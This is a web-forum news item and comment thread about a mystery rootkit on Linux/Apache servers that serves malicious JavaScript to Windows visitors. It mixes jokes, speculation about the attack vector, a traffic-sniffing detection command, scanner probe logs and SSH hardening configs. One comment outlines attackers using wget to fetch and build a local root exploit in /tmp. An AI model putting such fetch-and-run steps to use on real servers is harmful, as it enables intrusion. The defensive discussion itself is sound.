Mystery Malware Affecting Linux/Apache Web Servers

lisah writes "Reports are beginning to surface that some Web servers running Linux and Apache are unwittingly infecting thousands of computers, exploiting vulnerabilities in QuickTime, Yahoo! Messenger, and Windows. One way to tell if your machine is infected is if you're unable to create a directory name beginning with a numeral. Since details are still sketchy, the best advice right now is to take proactive steps to secure your servers. 'We asked the Apache Software Foundation if it had any advice on how to detect the rootkit or cleanse a server when it's found. According to Mark Cox of the Apache security team, "Whilst details are thin as to how the attackers gained root access to the compromised servers, we currently have no evidence that this is due to an unfixed vulnerability in the Apache HTTP Server." We sent a similar query to Red Hat, the largest vendor of Linux, but all its security team could tell us was that "At this point in time we have not had access to any affected machines and therefore cannot give guidance on which tools would reliably detect the rootkit."'"

Re:Ubuntu as well?

[oedneil]

As Ubuntu is indeed Linux, I'd venture to guess that it is affected.

Should have used IIS

This is why serious businesses choose a serious web server: Microsoft Internet Information Services running on Microsoft Windows Server.

Re:Should have used IIS

[Shaman]

Hahahahahaha hah aha aha aha hahahahaaha bwahahahaha ...wait, you're joking, right?

Re:Should have used IIS

[uberushaximus]

Of course not, this is internet, internet is serious business, we do not 'joke' here.

Re:Should have used IIS

LMFAO !!! You must be joking. What, one problem in ages and people should jump to IIS?? LOL, please. IIS & WinBlows have daily issues like this.

Re:Should have used IIS

[Niten]

In all seriousness though, IIS 6 has a pretty darn good security track record; seemingly better than Apache 2's, even if it is blasphemy for me to say it. I've previously decried the use of raw vulnerability statistics to make comparative claims about different products' security, but I think the fact that such a widely-deployed product as IIS 6 has been found to have only a single remote access vulnerability in the last four years really speaks for itself.

I mean, I'm just a Unix guy who's never had much use for a Windows web server, but that's my $0.02...

Re:Should have used IIS

[cthulhu11]

I have a handful of domains registered under the usual TLD's with web sites up for some of them. A while back, during the codered epidemic, someone from Microsoft actually called me trying to get me to switch to some web hosting of theirs (when I was hosting them myself for free). I got a good laugh out of that and the salescritter on the other end claimed to have never heard of codered.

Re:Should have used IIS

[jddunlap]

IIS and Windows Server are a joke. The problem being observed is that system administrators don't know what they are doing. If you stop the attacker from gaining shell access, in the first place, they can't run their rootkit! DISABLE ROOT SSH LOGINS AND PASSWORD BASED SSH AUTHENTICATION!!! Also, in case it isn't already painfully obvious, SELinux is there to protect you from exactly this kind of exploit. The Linux community needs to STOP TELLING PEOPLE TO SHUT IT OFF just because they don't understand how to use it.

Re:Ubuntu as well?

[PrescriptionWarning]

"the current thinking is that the malware authors gained access to the servers using stolen root passwords"

so basically its most likely they used the traditional means of gaining access (not through holes, but merely through bad personal security practices regarding passwords and password management). And it only affects windows clients. So how is this problem not your typical someone cracked your machine? Oh wait, I smell Microsoft FUD... ewwwwww

Something's fishy!

[linumax]

Last night I discovered a directory named 53 4B 59 4E 45 54 in my home folder.

Re:Something's fishy!

[JeepFanatic]

If you run those values through a hex to ascii converter you get SKYNET

Re:Something's fishy!

[Trigun]

Are those Bra sizes? You're into some weird shit man.

Re:Something's fishy!

[ls671]

Do you mean you MUST use a converter to solve it ? ;-)

Re:Something's fishy!

[iknowcss]

Aww, take the fun out of it ;)

Re:Something's fishy!

[sukotto]

Yeah, mine had 4 8 15 16 23 42

and all sorts of weird stuff's started happening in the server room

Re:Something's fishy!

[dcd]

$ perl -le 'print map { chr hex } split " ","53 4B 59 4E 45 54 "'
SKYNET

Re:Something's fishy!

[StargateSteve]

What is this ASCII/HEX converter you are speak of? I had to learn this stuff myself. I would have also expected skynet to make the jump to Unicode by now.

Re:Something's fishy!

[geminidomino]

I saw that on someone's shirt last week when I went to my spanish class at night school. I spent 25 minutes before class trying to figure out the pattern.

Now I google it and I see it's from a dumbass TV show. I'm pissed off.

Re:Something's fishy!

[n3uT]

At what time was this directory made? Check out your apache access and error log files. Try to correlate time when the directory was made to the access and error log/requests . I would like to see http requests coming to your server. I have found strange requests for robots.txt coming from IP addresses in korea and china. Just a get request for robots.txt

Re:Something's fishy!

[phalse+phace]

Really? I found a directory named 09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 c0

Re:Something's fishy!

[Wonda]

it is perfectly valid UTF-8, so no problem there

Re:Something's fishy!

[alex4u2nv]

What kind of weird shit?

Did you see Tsunami in your server room?!?!

Well it's easy to stop that. At the prompt type: ^C

Re:Something's fishy!

[kars]

It's called flirting.

Re:Something's fishy!

[Doctor+O]

Hey, that's exactly the combination I've got on my luggage!

Hummm, no ahah ?!

[DirtyFly]

I do believe tht if this story was with IIS it would be tagged ahah :)

Re:Hummm, no ahah ?!

[calebt3]

Don't you mean 'haha'?

Re:Hummm, no ahah ?!

[SeaFox]

Don't you mean 'haha'?

No, he means 'ahah' as in the Geekgasm that would be occurring over yet another IIS venerability to gleefully talk about.

Re:Hummm, no ahah ?!

[Detritus]

He's on a little-endian system.

Re:Hummm, no ahah ?!

[Trogre]

One little two little three little endians,
Four little five little six little endians,
Seven little eight little nine little endians,
Ten little endian trolls!

press release??

"According to a press release issued earlier this month ..."

Yawn.

Re:press release??

[westlake]

"According to a press release issued earlier this month ..."
Yawn.

Interesting.

Someone posts a story about compromised Apache servers and all it rates from the Geek is a yawn.

Re:press release??

[Gordonjcp]

Someone posts a story about compromised Apache servers

RTFA. It's nothing to do with Apache.

Re:Funny

[Undead+Ed]

According to the story (did you read it), it appears to be a situation where the root password has been compromised, not the applications or operating system.

Problems with IIS were as a result of vulns in the application and/or Windows operating system - totally different problem.

Would you blame a lock company if the user left his keys in the lock?

Ed

Am I safe?

[Solra+Bizna]

Does this rootkit work on a hardened Gentoo install with no LKM support on SPARC64? :P

-:sigma.SB

Re:Am I safe?

Does this rootkit work on a hardened Gentoo install with no LKM support on SPARC64? :P

Maybe; they're still compiling it.

Re:Am I safe?

[GreggBz]

Yes, but you have to compile it.

Re:Am I safe?

[bigredradio]

Your safe. NOTHING will run on that system. ;-)

Re:Am I safe?

[Akaihiryuu]

Gentoo should be safe to begin with. The default Gentoo Apache install does NOT run Apache as root, but as its own user.

Re:Am I safe?

[cp.tar]

Your safe. NOTHING will run on that system. ;-)

Except the compiler, of course.

Re:Am I safe?

[shywolf9982]

Just the password and IP should work. You're posting the root password after all.

Re:Am I safe?

[SL+Baur]

RTFA. The Javascript injection is separate from the Apache process, so it neither appears in the logs nor requires Apache to be running as root.

The virus patches itself into a running kernel via /dev/mem. It probably requires a specific kernel version to do the patching, but that's a completely different issue.

Re:Am I safe?

[Excelsior]

Hahaha. 640K is enough for anyone. HAHAH. All your base are belong to us. heehee

Doesn't anyone around here have an original bone in their body? If I don't hear the Gentoo compiling joke ever again, it'll be too soon.

Re:Funny

[Vellmont]

I think it's funny that Apache is affected by the same drama that affected IIS all those years ago.

Except IIS had security hole after security hole.

There's been no such security hole found in apache yet. So I'd wait before making comparisons to IIS.

mkdir 1

[hey]

I can see thousand of people trying to make numeric directories :)
Yes, also if you can run your tummy while patting your head you aren't infected also.
I think.... this crazy idea is the virus!

Re:mkdir 1

[CastrTroy]

I rushed off to try it myself. I used to be on a shared hosting service (hostreflex) that had their servers pwned once. Something would go out in the header of every PHP file that would get the browser to run the virus. Luckily my virus scanner blocked it. I'm not sure if anybody's computers got infected, but my site is pretty low traffic anyway. As soon as I found out the problem, I replaced my home page with a plain text file. No more problem. Needless to say I switched hosting companies pretty fast after that.

Re:mkdir 1

[gEvil+(beta)]

Yes, also if you can run your tummy while patting your head you aren't infected also.

Uh oh. I have no idea how to run my tummy. Crap, I must be infected!

Re:mkdir 1

[mblase]

I can see thousand of people trying to make numeric directories :)
Yes, also if you can run your tummy while patting your head you aren't infected also.

I heard that if you can spread your fingers and your hand covers your entire face, your server is infected.

Re:mkdir 1

[grub]

I can see thousand of people trying to make numeric directories :)

I just mkdir'd a numeric directory then remembered I run OpenBSD on my net-facing servers. :P

Re:mkdir 1

[garcia]

From the linked article:

This isn't always the case in older variants of the rootkit. To be certain your server isn't compromised, it's best to sniff packets for a brief 3-5 minute period. You can do this using the command below:
tcpdump -nAs 2048 src port 80 | grep "[a-zA-Z]\{5\}\.js'"

That's another way to check apparently.

Re:mkdir 1

[wanderingknight]

lucas@bilkis:~$ man mytummy
No manual entry for mytummy

Re:mkdir 1

[ls671]

I just tried it and damn I think I am infected since the system won't let me create the directory named "1".

$ mkdir 1
mkdir: cannot create directory `1': File exists

Re:mkdir 1

[mpoulton]

Uh oh. I have no idea how to run my tummy. Crap, I must be infected!

If you crap, then you DO know how to run your tummy!

Re:mkdir 1

[padyer]

That regex is b0rken. It matches any file of at LEAST 5 chars that ends in .js. The story at cPanel says that it is exactly 5 random chars and then the .js. Should be changed to

tcpdump -nAs 2048 src port 80 | grep "/[a-zA-Z]\{5\}\.js'"

Note the / at the beginning of the grep regex.

Re:mkdir 1

[Curtman]

Uh oh. I have no idea how to run my tummy. Crap, I must be infected!

Jack Daniels + Burger King. 12 to 24 hours you'll be worrying about how to make it stop running.

LOLserver?

[KublaiKhan]

IIS are serious server. This are serious thread.

Re:LOLserver?

Is can be rootkit tiem now plz?

Re:LOLserver?

[davidsyes]

That are be unpossible.

Re:LOLserver?

[snarfies]

I see what you did there.

Re:LOLserver?

[imipak]

invisble haxxxer!!!

Re:LOLserver?

[OECD]

Do Not Want!

Re:LOLserver?

[idontgno]

Your shipment of rootkit has arrived!

Re:LOLserver?

[Niten]

lolkit?
rootkitty?

Re:LOLserver?

[u-235-sentinel]

IIS are serious server. This are serious thread.

Well I for one am glad someone is taking this serious. I thought it was a joke for a moment. ::whew::

Thanks for helping clarify ;D

Re:Nimda Code Red Chunked Encoding......

[angus_rg]

Bozo the Clown serious?

Read it careful people...

[cbart387]

The servers are linux (because of an access issue. The computers being hurt by this are windows. At least that's how I read the article (see quote from article below).

According to a press release issued earlier this month by Finjan, a security research firm, compromised Web servers are infecting thousands of visitors daily with malware that turns their Windows machines into unwitting bots to do the bidding of an as yet unidentified criminal organization. Security firms ScanSafe and SecureWorks have since added their own takes on the situation, though with varying estimates on the number of sites affected. All reports thus far say the compromised servers are running Linux and Apache.

Re:Read it careful people...

[jawtheshark]

I do not know how you interpret this, but a rooted server, Linux, FreeBSD, OpenBSD or even Windows is also a "harmed" computer. Yes, clients will get infected, but the servers are in deep trouble too.

Re:Read it careful people...

[cbart387]

I take that back. :/ It seems like there's too many unknowns to jump to conclusions. I'm done conjecturing ... it won't serve any point at this time.

Re:Read it careful people...

[cbart387]

I admit, I jumped the gun. I'm done conjecturing until more information comes in. I usually get annoyed when people do so, so I really have no excuse.

Re:Read it careful people...

[primadd]

My site is still pretty new, life measured in months. Still I do get 20k attack tries a day! Searching for all kinds of old and bug ridden php/cgi scripts. Their stupid scripts seem to like my server as it returns a 301 if you connect using HTTP 1.1 but without a Host inside the header - apparently confuses the script. Heres a small example of the last few seconds.

"GET /phpchat//chat/messagesL.php3 HTTP/1.1" 301 335 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /PhpMyChat//chat/messagesL.php3 HTTP/1.1" 301 337 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /chatroom//chat/messagesL.php3 HTTP/1.1" 301 336 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /chats//chat/messagesL.php3 HTTP/1.1" 301 333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /forum//chat/messagesL.php3 HTTP/1.1" 301 333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /php/phpmychat//chat/messagesL.php3 HTTP/1.1" 301 341 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /phpMyChat-0.14.2//chat/messagesL.php3 HTTP/1.1" 301 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /phpMyChat-0.14.5//chat/messagesL.php3 HTTP/1.1" 301 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

--
free customizable social bookmarking widget for your site!
at the moment there are 7 different styles and 2 GPL'ed plugins available
account creation optional, feedback more than welcome

Re:Read it careful people...

[jawtheshark]

You're excused. Admitting you were wrong absolves you ;-)

Re:Read it careful people...

[mwasham]

"Access Issue" is different from "hurt"? I guess it's alright for a linux server to be compomised and distribute malware then?

Re:Read it careful people...

[h4rm0ny]

And astonishes us.

Re:Read it careful people...

[itismike]

I'm not sure what you're implying here... The news here is that the Linux servers are compromised. Being compromised to pass further damage onto another (Windows) client is still a compromise on the Linux server.

Re:Read it careful people...

[itismike]

What I find interesting (and a little sad) is how quickly the /. community modded the GP's post as +5 Informative. I understand that we're proud to run Linux, but that level of denial is slightly alarming.

Re:Read it careful people...

[cbart387]

You're correct and I've already acknowledged I was incorrect several hours ago..

Re:Read it careful people...

[cbart387]

I refer you to here.

Re:Read it careful people...

[jawtheshark]

Well, there are a lot of Linux fanboys around here. Oh, I won't deny cheering for Linux whenever I can (I'm mostly a BSD guy, but it hasn't the glamour), but when I see a problem, I won't deny it. The GP got modded down after a while, because there are level-headed moderators too.

Re:Read it careful people...

[cbart387]

I think I can speak for the GP in that he agrees with you since I'm pretty sure he knows he misspoke ;) However I get more annoyed with the moderators who give +'s to the 'Does run Linux', 'You must be new here' comments. I'll stop there.

Re:Funny

[plague3106]

I read it, here's what it said: "One great unknown thus far is how the servers come to be infected. Absent any forensic evidence of break-ins, the current thinking is that the malware authors gained access to the servers using stolen root passwords."

In other words, they have no idea how the servers were compromised. Because they can't find out how, they're guessing it was a root password that was stolen. In other words, its still just as likely a flaw in some software.

Re:LISTEN UP

Underage anime? Does that refer to pictures drawn after 1990?

Can't be malware

[Anonymous+MadCoe]

It's for Apache/Linux so it must be well crafted code written with the best intention....

Isn't that always the case with FOSS. If it was for Microsoft then it would be _real_ malware....

Re:Can't be malware

[geminidomino]

It's for Apache/Linux so it must be well crafted code written with the best intention.... Then how do you explain PHP?

*sniff sniff* Is something burning?

Re:Can't be malware

Underappreciated post here.

Re:Can't be malware

[ray-auch]

That's the secondary infection.

The tough question is what is the malware that is infecting the servers themselves. There have been reports of this for weeks now, and apparently it may go back months (see eg. http://www.channelregister.co.uk/2008/01/16/mysterious_web_infection_continues/), and AFAICS:

a) no one knows the initial attack vector (on the _servers_)
b) the malware (on the _servers_) seems to be difficult to detect
c) and no one seems to know how to remove it successfully either - some have suggested it is a rootkit as the apache part of the infection seems to reappear when removed.
d) possibly as a result of (b), estimates are vague on number of infected servers, but I've seen estimates from "hundreds" to "tens of thousands"
e) seems to be Linux + Apache stack that is targeted

Re:Can't be malware

[Zapotek]

Must...reload...gun...

Re:Can't be malware

[WK2]

It's for Apache/Linux so it must be well crafted code written with the best intention.... Isn't that always the case with FOSS.

If the malware author didn't include the source code, then it is not FOSS. On a serious note, some malware authors actually do include source code. More likely the "1337" ones, and not the ones who are doing it for profit. Sometimes as crackers are exiting crime, they will share their code.

Re:Can't be malware

[Crayon+Kid]

Ah, but PHP is special. It's like issuing buldozers to the population at large. Some will get some useful work done. Most will tear down their house and uproot the trees.

Well...

I did a mkdir 09F911029D74E35BD84156C5635688C0 and all I got was a DMCA rm -f 09FA* request.

Re:Software sucks.

How is that flamebait? I'm dead serious. If the quality of software doesn't improve dramatically, we're going to be in a world of hurt very soon. How do you suggest we achieve that improvement if not by making authors of faulty software liable for their negligence? We certainly can't keep upgrading software every time a bug is found, if bugs keep cropping up at the current rate.

What are the common factors?

[Arrogant-Bastard]

To figure out what the compromise vector is, it's probably going to be necessary to figure out what the compromised servers have in common -- and how that differs from uncompromised servers. (Keeping in mind that currently-uncompromised servers may have the same vulnerability, and that attackers or their software just may not have gotten to them yet.)

I'd suggest enumerating factors such as OS, OS version, remote access methods (ssh, ftp, etc.), Apache versions, Apache modules, add-ons like CPanel, network/ASN, and so on -- anything could be a culprit at this point.

And that includes things that have nothing to do with Linux or Apache: for example, it's possible that the attackers acquired root passwords by infecting Windows systems used by administrators -- then just waited for them to initiate ssh sessions to their servers. It'd probably be best to leave all possibilities open and consider them equally likely until evidence starts accumulating in favor of/against them. (In re-reading that last statement, I suppose it sounds a bit trite. I'm just trying to discourage premature conclusions that anything is at fault until somebody can produce evidence to support saying so.)

Re:What are the common factors?

[whoever57]

To figure out what the compromise vector is, it's probably going to be necessary to figure out what the compromised servers have in common -- and how that differs from uncompromised servers. (Keeping in mind that currently-uncompromised servers may have the same vulnerability, and that attackers or their software just may not have gotten to them yet.)

Perhaps this is the end result of all those dictionary attacks against SSH servers that we have seen for the past 2-3 years. Inevitably, some of those attacks will have been successful. Perhaps the successful logins have not ben exploited until now.

Re:What are the common factors?

[Arrogant-Bastard]

That (use of data harvested from ssh attacks) is entirely possible. Some of those attacks had to successful against some hosts.

So maybe one possible line of investigation would be to see if any hosts which defended against ssh dictionary attacks (say, by throttling back or denying connections from hosts that made too many ssh tries) were compromised. (I suppose it'll also be necessary to assess the strength of their root passwords; sufficiently weak ones might not require a concerted ssh attack to be compromised.)

Sure, this could be the wrong line of reasoning -- but given that we've all seen the ssh attacks you refer to, it's probably worth investigating.

Re:What are the common factors?

[element-o.p.]

No doubt -- I've seen enough SSH attacks against my servers to be nervous about possibilities like that. But that's why I've used iptables to block ssh from everything except the handful of networks from which I might connect.

Re:What are the common factors?

[michaelwigle]

Perhaps this is the end result of all those dictionary attacks against SSH servers that we have seen for the past 2-3 years. Inevitably, some of those attacks will have been successful. Perhaps the successful logins have not ben exploited until now.
You may very well be right. I only learned about those attacks a few months ago and installed denyhosts.py on my system to block it. I was shocked when I actually checked my ssh logs to see how many attacks there were in the logs. Thank goodness for strong passwords. As a side note, I'm running Apache/2.2.3 (Debian) DAV/2 mod_python/3.2.10 Python/2.4.4 PHP/4.4.4-8+etch4 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 and appear to be fine following both tests for the rootkit. I have a feeling we're going to find it was a matter of getting root access to one or two hosting sites (maybe even an inside job) and spreading from there.

Re:What are the common factors?

[imipak]

Apparently it's not Cpanel.

Other info as of last week:

Various discussions:
http://www.webhostingtalk.com/showthread.php?t=651748
(useful discussion starts on page 3 or so)
http://www.theregister.co.uk/2008/01/11/mysterious_web_infection/
(describes the inability of ScanSafe to work out what's happening)
Trend have a piece on their blog:
http://blog.trendmicro.com/e-commerce-sites-invaded/
SANS/ISC
http://isc.sans.org/diary.php?storyid=3834&rss

Re:What are the common factors?

[zcat_NZ]

When I want a windows box to ssh, i use putty..

Re:What are the common factors?

[rk]

I'm not worried... it's not like my root password of 's$1mHk8;e$%a4' is going to be in anyone's dictionary.

Wait... oh shit.

Re:What are the common factors?

[Alioth]

It's quite possibly due to buggy PHP scripts. I've seen it before; what happens is the attacker goes for some unpatched vulnerability in PHPnuke, PHPbb or similar software. This gets them non-root access. They use this to 'wget some-hack.c' to the /tmp directory, build this hack then execute this to exploit a local root exploit.

This is why I treat all local root exploits as seriously as remote root exploits. All it takes is one buggy PHP script and then the attacker can try local root vulns.

Re:What are the common factors?

[ET_Fleshy]

Supposedly, infected servers that are rebuilt become re-infected with no obvious sign of infection leading some to believe that root passwords were compromised for those servers.

Re:What are the common factors?

[Suicyco]

I have not had a single failed login attempt on an ssh server since I moved the port numbers. Obviously nobody is doing port scans on my systems, just automated ssh login attempts.

Re:What are the common factors?

[Crayon+Kid]

Why the hell has it become so accepted that PHP would make bad applications by default? I don't see this as a problem with stupid developers using PHP. It's a problem with stupid developers not knowing the first thing about security. You can use system(), eval() and have SQL injections in other languages as well. And you can write perfectly secure applications in PHP.

It's the overall developer quality, not the language. If these people were using any other language we'd still have problems.

(And don't tell me about register_globals and old vulnerabilities either, stuff like this has been bad practice and disabled by default for years now, whoever uses it is asking for it.)

Re:What are the common factors?

[Paulo]

Go spread your FUD somewhere else, you M$ shill. PHPNuke and PHPBB are open source, and we all know that OSS is by definition secure and has no vulnerabilities. Where do you get off claiming something that is impossible?

Re:What are the common factors?

[Alioth]

Because, well, there are so many bad PHP applications. My original post did not single out PHP, it singled out bad PHP _applications_. PHPbb and PHPnuke are well known examples - serious flaws found in both, and unpatched versions of this PHP software is left lying around for years.

The typical shared hosting only offers PHP as a scripting language. So lots of non-administrators and non-developers are uploading random PHP scripts to their $2 a month hosting sites, and then not updating them when security vulnerabilities are found.

It doesn't help that many of the random tutorials on the web on PHP show examples of sending things like unchecked values to SQL select statements and unchecked values used to open files on the filesystem.

Just as you can make Windows secure, the vast majority of Windows users are the infection vector (rather than Windows itself) because they install random crap and don't update it. Same for PHP - its ubiquity on cheap shared hosting means lots of badly written random PHP crap floats around, and these almost unsupervised servers end up getting rooted via a PHP script and a local root exploit.

I *do* run PHP stuff on my servers - such as MediaWiki. But I keep them up to date. For everyone who keeps their scripts up to date, there are 10 shared hosting accounts which don't.

The register's older writeup on this ...

[chris.dag]

The Register has been on this for a while and although the story is older it is better written and has more interesting details: http://www.channelregister.co.uk/2008/01/16/mysterious_web_infection_continues/

my $.02 of course

Re:The register's older writeup on this ...

[Mediamon]

Some additional reports from earlier this week and previous...

http://blog.trendmicro.com/e-commerce-sites-invaded/

http://www.scmagazineus.com/Attack-injects-malicious-JavaScript-into-e-commerce-sites/article/104206

http://www.theregister.co.uk/2008/01/11/mysterious_web_infection/

http://www.cpanel.net/security/notes/random_js_toolkit.html

http://isc.sans.org/diary.html?date=2008-01-18

http://isc.sans.org/diary.html?date=2008-01-14

http://www.webhostingtalk.com/showthread.php?p=4902045

ssh + bad password

[Panaflex]

I see this type of attack all the time, the fact that someone automated it and gave it a zombie machine is not surprising.

* Don't allow root to ssh into your machine.
* Disable ssh1.
* Limit sudoers.
* Have good passwords.
* ???
* PROFIT!!

Seems like a formula everyone should know.

Re:ssh + bad password

[whoever57]

* Don't allow root to ssh into your machine.

Dangerous if you don't have easy physical access to your machine. It is possible to screw up a machine in such a way that a normal user cannot log in, but root can. It is better to:

* Disable password authentication in SSH -- require key-based authentication

Re:ssh + bad password

[ScouseMouse]

* Don't allow root to ssh into your machine.

I was most surprised when I found that Redhat (Our cooperate Linux of Choice) appears to allow this as the default. Certainly, The Debian box i use as a home server never used to allow that, however, checking i see that since I upgraded from Woody, it does allow remote SSH as root. Thats worrying.
Well have to fix that.

Re:ssh + bad password

[Panaflex]

That's a good idea - but be careful!

Attackers can trampoline onto other machines in the network if they share the same key. If you're going to do then be careful about which machines can freely contact each other, and use separate keys for each server.

Re:ssh + bad password

[mandelbr0t]

Allow me to insert one step before ???

* Follow-up on your SSH logs. If you see a phishing attack, do something about it!

That something could be:

- Report the IP to the owner of the netblock who can be found at ARIN. All netblock owners must have an IP-admin address or an abuse address. Unfortunately, my experience is that most of these go to /dev/null. There are those who actually have responsible NOC staff, and they will act on your complaint if you send them a copy of the relevant logs.

- Block further network access from that particular netblock at your firewall. I've found this to be a very effective method. Believe it or not, you don't end up blocking the entire Internet; the places that launch such attacks are not very common.

- Rate-limit SSH access. This works well, but I've locked myself out of my own server!

Re:ssh + bad password

[PinkPanther]

If someone is going to render there machine usable only by root, then I strongly doubt they've taken the time or have the knowledge to implement security precautions listed above. If they know how, they likely should and likely won't render their machine useless.

In addition, if they really might render the machine useless, they likely shouldn't have it on the 'net.

Re:ssh + bad password

[ls671]

You should also have some process that completely blocks ssh login attempts from a given IP after so many failed login attempts instead of letting the hi-jacker poll your machine for as long as he wishes.

Re:ssh + bad password

[MrDoh1]

I've found that Denyhosts is a nice tool to take care of securing SSH and blocking hosts of incorrect SSH attempts.

Re:ssh + bad password

[mi]

* Don't allow root to ssh into your machine.

Dangerous if you don't have easy physical access to your machine.

No, it is not. On *BSD family of Operating Systems root can only login on the local console anyway.

If you screw something up badly, you ssh in as yourself first, and then perform `su' — something, that only members of the wheel-group (gid 0) are allowed to do.

My FreeBSD machines all run a crude log-watcher, which blocks-out machines, from where root- and similar logins are attempted, immediately.

Re:ssh + bad password

[Archiviste]

You should also have some process that completely blocks ssh login attempts from a given IP after so many failed login attempts instead of letting the hi-jacker poll your machine for as long as he wishes.

Not quite "after so many failed login attempts", but useful nonetheless: DenyHosts

Re:ssh + bad password

[Crimsonjade]

I personally use http://www.fail2ban.org/wiki/index.php/Main_Page

Re:ssh + bad password

[Lumpy]

better yet, add a script that looks for these attacks and add a DROP rule to iptables for every IP that does it.

Really basic admin scripting, suprising it's not a part of any distros.

Re:ssh + bad password

[gosand]

You should also have some process that completely blocks ssh login attempts from a given IP after so many failed login attempts instead of letting the hi-jacker poll your machine for as long as he wishes.

For me, that process is "hmm, from looking at gkrellm, someone is pounding eth0".. tail -f /var/log/auth.log... yep. stop sshd, wait 15 min, restart it.

I'd really like to have something a little more automated... something that would block an IP if they tried to ssh in using an unknown user more than 3 times.

Re:ssh + bad password

Any idea how to do this? I'm an unexperienced person planning to set up a Debian home server, but these attacks have me paranoid.

Re:ssh + bad password

http://hexten.net/wiki/index.php/Pam_abl

Re:ssh + bad password

[Trogre]

fail2ban is great for that. I have my servers set to email me every time some joker tries three unsuccessful ssh logins in 10 minutes. It then disables that IP for a further 10 minutes. And try they do. I couldn't believe it the first time I installed it, how many pwned boxes are sitting there all day trying dictionary login attacks on public servers.

Of course disabling remote root logins is a must too.

Re:ssh + bad password

[stuff+and+such]

DenyHosts
you can set different rules for, root, real users, and logins that don't exist.

Re:ssh + bad password

[Sancho]

Can you explain this a little more? When most people talk about using keys, they're talking about public key authentication--that is, I toss my public key on the server in ~/.ssh/authorized_keys and then, as long as I have my public key with me, I can log in. I can put that public key on any number of servers and do the same thing. If one of the servers becomes infected, it cannot log into the others with my key because my private key is not on any of them.

Re:ssh + bad password

[Culture20]

Fail2ban, Denyhosts
you can also use iptables to limit the amount of connections from [IP] per [time_unit] but that's not as handy.
The problem with all of these methods: wait until someone uses a botnet to bruteforce a machine they _really_ want. If someone has Fail2ban/Denyhosts on a machine, it means the sysadmin needs sshd open to semi-global IP ranges, and with a botnet, each zombie gets [num_tries] attempts.

Re:ssh + bad password

[Sancho]

Really, you should be using strong passwords and monitoring your logs. With a strong password, the chance of having a brute-force attack compromising your server is minimal, and anything which comes close should be seen in the logs long before it manages to succeed.

Re:ssh + bad password

[Bert64]

All of the ssh brute forcing tools i've seen are based on libssh, and announce as much in their banner...
It's a fairly trivial patch to make sshd do pattern matching on the connecting client, and drop connections from libssh based clients.

Re:ssh + bad password

[Gordonjcp]

The quick and dirty way is to move SSH to a non-standard port. This is a particularly good idea if you've got a bunch of machines behind a NAT firewall anyway, because they can't *all* have port 22.

I know "security through obscurity" isn't really secure, but it has entirely eliminated attempts to crack the root password on all the servers I run.

Re:ssh + bad password

[Niten]

I'll see your good point, and raise you a pf.conf snippet:

### MACROS AND TABLES SECTION
table <wan_bruteforce> persist

### PACKET FILTERING SECTION
block in quick on $if_wan inet from <wan_bruteforce>
# ...
pass in on $if_wan inet proto tcp from any to ($if_wan) \
port ssh flags S/SFRA synproxy state \
(max-src-conn-rate 3/30, overload <wan_bruteforce> flush global)

That's how you can block non-massively-distributed password dictionary attacks on the BSDs, anyway. Sadly, the fact that OpenBSD's firewall can perform this task on its own means that we probably won't see this feature worked into OpenSSH itself any time soon -- so on Linux you'll need a third-party script such as DenyHosts, as others have already pointed out.

(And yeah, unlike this PF configuration, DenyHosts lets you synchronize your table with a sort of universal blacklist of blocked hosts, so some might choose to run it on BSD anyway. It sounds like a good idea on paper, but boy does it suck when your home IP address keeps inexplicably winding up on the blacklist due to what turns out to be a single site's massively misconfigured server.)

But I think the most important lesson to be learned here, assuming that this thing does turn out to be an ssh attack, is that allowing single-factor, password-based administrative logins to a highly connected host is never a good idea. If you have the luxury of complete control over the site and its users (or are simply a highly empowered BOFH), disable password-based logins entirely and force the use of ssh public keys:

# /etc/ssh/sshd_config
PubkeyAuthentication yes
ChallengeResponseAuthentication no
PasswordAuthentication no
KerberosAuthentication no
GSSApiAuthentication no
UsePAM no

As a concession, if you want to ensure access without having to carry around an encryption key on a USB dongle, on Linux you can use PAM and libpam-opie to set up secondary access using a dual-factor combination of an S/Key one-time password and your regular login password (S/Key is like Steve Gibson's much-trumpeted "Perfect Paper Passwords" system, which is ingenious in its own right, except that S/Key is designed so that you don't need to keep your secret key stored unencrypted on the very server you're worried about protecting):

# /etc/ssh/sshd_config
PubkeyAuthentication yes
ChallengeResponseAuthentication yes
PasswordAuthentication no
KerberosAuthentication no
GSSApiAuthentication no
UsePAM yes

# /etc/pam.d/ssh
auth requisite pam_opie.so
auth required pam_unix.so nullok_secure

With the above configuration you can still log in seamlessly using your ssh private key. But if you get stuck somewhere without access to your private key, you just pull your S/Key passwords list out of your pocket and enter the next password in the sequence, as prompted, followed by your login password. This PAM configuration has the nice property that if you enter the correct S/Key password but then an incorrect Unix password, you will be asked for the next one-time password in the sequence before you can continue: so unless your attacker is exceptionally good at plaintext attacks on large cryptographic hashes, a successful brute-force attack becomes impossible.

Wow, this post got a lot longer than I wanted it to... I'm, um, going out to get some fresh air or something.

Re:ssh + bad password

[phrostie]

i've never liked that ssh allows root logins at all.

how do you disable it?

Re:ssh + bad password

[Xipher]

Incorrect, it wasn't until 4.2 I believe that OpenBSD disabled direct root logins over SSH by default.

Re:ssh + bad password

[caluml]

Change the SSH port to something non-standard. And if you've compiled SSH with tcpd: echo sshd: my.home.ip/255.255.255.255 >> /etc/hosts.allow ; echo sshd: ALL >> /etc/hosts.deny
Then the only connections can come from my home machine (or whatever ranges you think you're likely to log in from). You can sshd: .uk in /etc/hosts.allow too, or sshd: .cn in /etc/hosts.deny, although trusting what the reserve DNS says is probably not the cleverest.

Re:ssh + bad password

[toadlife]

On *BSD family of Operating Systems root can only login on the local console anyway. OpenBSD does not have this restriction by default.

Re:ssh + bad password

[Bert64]

Or just run ssh on a non standard port, the automated scripts aren't smart enough to scan for other ports running ssh, and it wouldnt be worth it for them to do so...
